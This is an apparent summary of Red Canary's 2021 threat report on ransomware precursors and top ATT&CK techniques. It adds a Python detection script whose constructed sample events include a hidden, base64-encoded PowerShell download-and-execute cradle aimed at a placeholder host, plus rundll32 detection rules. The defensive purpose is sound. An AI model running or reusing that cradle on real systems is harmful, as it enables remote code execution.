New research from Red Canary indicates that by building robust detection coverage for the techniques adversaries abuse most often, security teams can achieve defense-in-depth against the many threats that leverage those techniques and against the broader trends that dominate the infosec landscape.
The report is organized into three cascading sections: trends, the threats that make up those trends, and the MITRE ATT&CK® techniques those threats leverage. Each section includes extensive guidance that security teams can use to mitigate, prevent or detect the malicious activity the report describes.
The biggest trend in 2021, unsurprisingly, was ransomware. Counterintuitively, Red Canary itself doesn't detect much ransomware, and the reason for that is probably the single most important takeaway from the report. Ransomware is almost always the eventual payload delivered by earlier-stage malicious software or activity; if you detect the threats that deliver the ransomware, you stop the ransomware before it arrives. So how do you detect those threats? Focus on the techniques adversaries are most likely to leverage.

Of the top 10 threats Red Canary observed in 2021, 60% are ransomware precursors (i.e., threats that have been known to deliver ransomware as a follow-on payload). More staggering is that a full 100% of the top ATT&CK techniques have been used during an attempted ransomware infection.
For example, a significant plurality of ransomware infections involve the use of a command and control (C2) product called Cobalt Strike, Red Canary's second-ranked threat. Cobalt Strike, in turn, leverages ATT&CK techniques like PowerShell, Rundll32, Process Injection, Obfuscated Files or Information and DLL Search Order Hijacking, all of which are in the top 10. If you develop broad detection coverage for those techniques, you have a great shot at detecting Cobalt Strike and stopping ransomware infections.
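To make the "cover the technique, not the payload" idea concrete, here is a small added example of technique-level detection logic run over constructed process-creation events. It is not code from Red Canary or from the report: the rules, the Sysmon-style field names (image, parent_image, command_line), the sample events and the ATT&CK ID mapping (T1059.001 for PowerShell, T1218.011 for Rundll32, T1027 for Obfuscated Files or Information) are all my assumptions. It covers three of the five techniques named above; Process Injection and DLL Search Order Hijacking need other telemetry (image loads, cross-process handle access) and are deliberately out of scope here.

```python
import base64

# ATT&CK technique IDs for techniques the article names. The IDs are my
# mapping (assumption); the article gives technique names only.
T_POWERSHELL = "T1059.001"  # Command and Scripting Interpreter: PowerShell
T_RUNDLL32 = "T1218.011"    # System Binary Proxy Execution: Rundll32
T_OBFUSCATED = "T1027"      # Obfuscated Files or Information

# Parents that should essentially never spawn an interpreter or rundll32.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}


def decode_encoded_command(blob):
    """Decode a PowerShell -EncodedCommand argument (base64 of UTF-16LE).
    Returns None when the argument is not a valid encoded command."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def _is_encoded_flag(arg):
    # PowerShell accepts any unambiguous prefix of -EncodedCommand, plus -ec.
    a = arg.lower()
    return a == "-ec" or (len(a) >= 2 and "-encodedcommand".startswith(a))


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect(event):
    """Return a list of (technique_id, reason) hits for one process-creation
    event with Sysmon-style fields: image, parent_image, command_line."""
    image = _basename(event["image"])
    parent = _basename(event["parent_image"])
    args = event["command_line"].split()
    hits = []

    if image in ("powershell.exe", "pwsh.exe"):
        for i, arg in enumerate(args[:-1]):
            if _is_encoded_flag(arg):
                decoded = decode_encoded_command(args[i + 1])
                hits.append((T_POWERSHELL, f"encoded command decodes to {decoded!r}"))
                hits.append((T_OBFUSCATED, "base64-encoded PowerShell argument"))
                break
        if parent in OFFICE_PARENTS:
            hits.append((T_POWERSHELL, f"PowerShell spawned by {parent}"))

    if image == "rundll32.exe":
        if len(args) <= 1:
            # No DLL/export given: a common hollow host for injected code.
            hits.append((T_RUNDLL32, "rundll32 started with no arguments"))
        elif any(a.lower().startswith("javascript:") for a in args[1:]):
            hits.append((T_RUNDLL32, "rundll32 executing a javascript: payload"))
        if parent in OFFICE_PARENTS:
            hits.append((T_RUNDLL32, f"rundll32 spawned by {parent}"))

    return hits


def techniques_seen(events):
    """Map the index of every event that fired to the technique IDs it hit."""
    out = {}
    for i, event in enumerate(events):
        hits = detect(event)
        if hits:
            out[i] = {technique for technique, _ in hits}
    return out


# Constructed sample events (not real telemetry). The encoded command is
# built here so the base64 matches what PowerShell would actually accept.
_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')"
_ENC = base64.b64encode(_SCRIPT.encode("utf-16-le")).decode("ascii")

SAMPLE_EVENTS = [
    {"parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe",
     "command_line": r"notepad.exe C:\Users\alice\notes.txt"},
    {"parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -nop -w hidden -enc " + _ENC},
    {"parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\rundll32.exe",
     "command_line": "rundll32.exe"},
    {"parent_image": r"C:\Windows\System32\services.exe",
     "image": r"C:\Windows\System32\rundll32.exe",
     "command_line": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"},
]

if __name__ == "__main__":
    for i, event in enumerate(SAMPLE_EVENTS):
        for technique, reason in detect(event):
            print(f"event {i}: {technique}: {reason}")
```

Run stand-alone, the script flags the Office-spawned encoded PowerShell (both T1059.001 and T1027) and the argument-less rundll32, while the benign notepad and Control Panel rundll32 events stay quiet. The point of keying rules to techniques rather than to a specific tool is that the same logic fires whether the encoded PowerShell came from Cobalt Strike, a commodity loader or a hands-on operator.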
The report is based on analysis of the more than 30,000 confirmed threats detected across Red Canary's customer base in 2021.
Read the full report by Red Canary.